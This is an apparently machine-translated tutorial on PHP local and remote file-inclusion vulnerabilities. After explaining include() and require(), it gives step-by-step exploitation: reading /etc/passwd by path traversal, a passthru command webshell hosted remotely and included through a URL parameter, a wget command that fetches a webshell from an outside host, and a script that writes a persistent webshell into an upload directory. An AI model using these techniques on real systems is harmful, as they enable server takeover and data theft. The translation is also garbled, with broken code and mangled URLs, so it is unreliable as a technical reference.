I. involved dangerous functions (include (), require () and include_once (), require_once ()〕
Include () & require () Statement: includes and runs the specified file.
These two structures are identical except for how to handle failures. Include () generates a warning and require () causes a fatal error. In other words, if you want to stop processing the page when a file is lost, use require (). This is not the case with include (). The script will continue to run.
If "allow_url_fopen" is activated in PHP (configured by default), you can also use URL (through HTTP or other supported encapsulation protocols) instead of local files to specify the files to be included. If the target server interprets the target file as PHP code, you can use the URL request string applicable to http get to pass variables to the included file.
Http://www.phpe.net/manual/function.include.php
Require_once () & amp; include_once ()
The require_once () and include_once () statements include and run the specified file during script execution. This behavior is similar to the require () statement. The only difference is that if the code in the file has been included, it will not be included again. This method is applicable when the same file may be included more than once during script execution. You want to ensure that the file is included only once to avoid function redefinition and variable re-assignment.
Http://www.phpe.net/manual/function.require-once.php
Ii. Why file inclusion?
When programmers write programs, they do not like to do the same thing or write the same code (such as some common functions) several times, therefore, the public code is written in a separate file, such as share. PHP, and then include the call in other files. In PHP, we use the functions listed above to achieve this goal. The workflow is as follows. PHP contains share. PHP, I will write include ("share. PHP), and then you can use share. PHP functions, such as the name of the file that needs to be written to death, have no problems or vulnerabilities. So what exactly is the problem?
Sometimes you may not be sure which file to include. For example, let's look at the index. php code of the file below:
Code: [copy to clipboard]
---------------------------
If ($ _ Get [Page]) {
Include $ _ Get [Page];
} Else {
Include "home. php ";
}
A piece of PHP code is normal. How does it work? This involves the meaning of $ _ get, so I won't talk about it (or I can write an HTTP Article). If you still don't know get, post, and so on, then you need to make up some relevant information on Google.
The format of the above Code may be: http://www.php100.com/php/index.php? Page = Main. php or http: // www.php100.com/php/index.php? Page = downloads. php:
1. Submit the URL above and obtain the value of this page in index. php ($ _ Get [Page]).
2. Check whether $ _ Get [Page] is empty. If it is not empty (main. php here), use include to include this file.
3. If $ _ Get [Page] is empty, run else to include the home. php file.
Iii. Why are vulnerabilities discovered?
You may want to say that this is good. It is very convenient to dynamically include files according to URLs. How can this cause a vulnerability? The answer to the question is: we are not clever, we always like to be different from others, we will not follow his link to operate, we may want to write their own files to contain (CALL, for example, we will randomly enter the following url: http: // www.1steam.cn/php/index.php? Page = Hello. php. Then our index. the PHP program is silly and follows the steps above to execute: Get page as hello. PHP, and then go to include (hello. PHP), then the problem occurs, because we do not have hello. PHP file, so it will report a warning when it is included, similar to the following information:
Quote:
Warning: Include (hello. php) [function. Include]: failed to open stream: no such file or directory in/vhost/wwwroot/PHP/index. php on line 3
Warning: Include () [function. include]: Failed opening 'Hello. PHP 'for declaration (include_path = '.: ') in/vhost/wwwroot/PHP/index. PHP on line 3
Note that the preceding warning cannot find the specified hello. the PHP file, that is, the file that does not contain the specified path. The following warning is that the specified file is not found before, so a warning is given when the file is included.
Iv. How to Use
As we can see above, there is a problem, so how can we use such a vulnerability? There are actually a lot of exploitation methods, but they are essentially similar. Here I will talk about three common exploitation methods:
1. Including reading other files on the target machine
As we can see above, because the obtained parameter page is not filtered, We can randomly specify other sensitive files on the target host, such as in the previous warning, we can see the exposed absolute path (vhost/wwwroot/PHP/), so we can detect multiple times to include other files, such as specifying the URL as: http: // www.php100.com/php/index.php? Page =. /txt.txtcan be used to read the TXT file from the current directory .. /.. /perform directory jump (without filtering .. /). You can also directly specify an absolute path to read sensitive system files, such as the URL: http: // www.php100.com/php/index.php? Page =/etc/passwd. If the target host does not have strict permission restrictions, or the Apache startup permission is relatively high, you can read the content of this file. Otherwise, a warning similar to open_basedir restriction in effect. will be obtained.
2. Include a runable PHP Trojan
If the "allow_url_fopen" of the target host is activated (activated by default, but few will modify it), we can have a larger space for use, we can specify a webshell containing PHP code on other URLs for direct running. For example, I first write a PHP code that runs the command (with comments added, I should be able to understand it ), save it as cmd.txt (the suffix is not important, as long as the content is in PHP format ).
If (get_magic_quotes_gpc ())
{$ _ Request ["cmd"] = stripslashes ($ _ request ["cmd"]);} // remove the Escape Character (the backslash character in the string can be removed)
Ini_set ("max_execution_time", 0); // set the execution time for this file. 0 is unlimited.
Echo"
1. s.t
";
Summary: // print the returned start line prompt passthru ($ _ request ["cmd"]); // run the command echo "1. s.t "; // The returned end row prompt information?> The purpose of the above file is to accept the command specified by CMD and call the passthru function for execution to return the content between 1. s.t. Save this file to the server on our host (it can be a host that does not support PHP), as long as it can be accessed through HTTP.
// Print the returned start line prompt.
Passthru ($ _ request ["cmd"]); // run the command specified by CMD
Echo"
1. s.t
"; // Print the returned end row prompt information
?>
The purpose of the above file is to accept the command specified by CMD and call the passthru function for execution to return the content between 1. s.t. Save this file to the server on our host (it can be a host that does not support PHP), as long as it can be accessed through HTTP, for example, the address is as follows: http://www.php100.com/developer.txt, then we can construct the following URL on the vulnerability host to take advantage of: http://www.php100.com/php/index.php? Page = http: // www.php100.net/developer.txt? Cmd = ls. CMD is followed by the command you need to execute. Other commonly used commands (take * Unix as an example) are as follows:
Quote:
Ll column directory and file (equivalent to dir in Windows)
PWD to view the current absolute path
Id whoami view current user
Wget downloads the file of the specified URL
Wait for others. Go to Baidu to find the host.
The above method is to get a webshell (although this PHP file is not on the target machine, it is indeed a webshell, isn't it? Haha)
3. a PHP file containing the created File
Some people may think that it is more reassuring to get a real webshell on the target machine. If someone finds that the vulnerability is fixed, we can no longer remotely include the "pseudo" webshell above, right? We can understand this mentality. Let's continue. To get a real webshell, we also talk about two common methods:
1) use commands such as wget to download a webshell
This is simple and often used. In the pseudo webshell we obtained above, we can execute commands, so we can also call a very powerful role in the system, wget, this command is powerful. You can use Google to get a lot of parameters, and it will definitely confuse you. Haha, we don't need to be so complicated. We will use a-O (-output-document = file, write the document to the file.
The premise is that you put a webshell containing PHP code in a place that can be accessed through HTTP or FTP, such as http://www.php100.com/1stphp.txt. The content of webshellis written in this file. Then we execute the following url: http://www.php100.com/php/index.php? Page = http: // www.php100.com/developer.txt? Cmd = wgethttp: // www.php100.net/1stphp.txt-o 1stphp. PHP. If the current directory is writable, you can get a file named 1stphp. PHP webshell. If the current directory cannot be written, you need to find another method.
2) use files to create
The previous wget may encounter a situation where the current directory cannot be written; or the command is disabled (or not installed) on the target host, and we need to modify it again, we can combine the previous File Inclusion Vulnerability to include a PHP script for creating a file (writing a file). The content is as follows:
$ F = file_get_contents ("http://www.php100.com/1stphp.txt#;); // open the file stream in the specified path
$ FF = fopen ("./upload/1st. php", "a"); // you can find a directory and create a file.
Fwrite ($ ff, $ F); // write the previously opened file stream to the created File
Fclose ($ ff); // close the save file
?>
Or write the PHP file we downloaded with wget, But we improved the method and implemented it with the PHP script. Can we use the above cmd. php? Cmd = LL: Find the writable directory, for example, upload, and create the file under this directory:./upload/1st. php. Then we can get our webshell.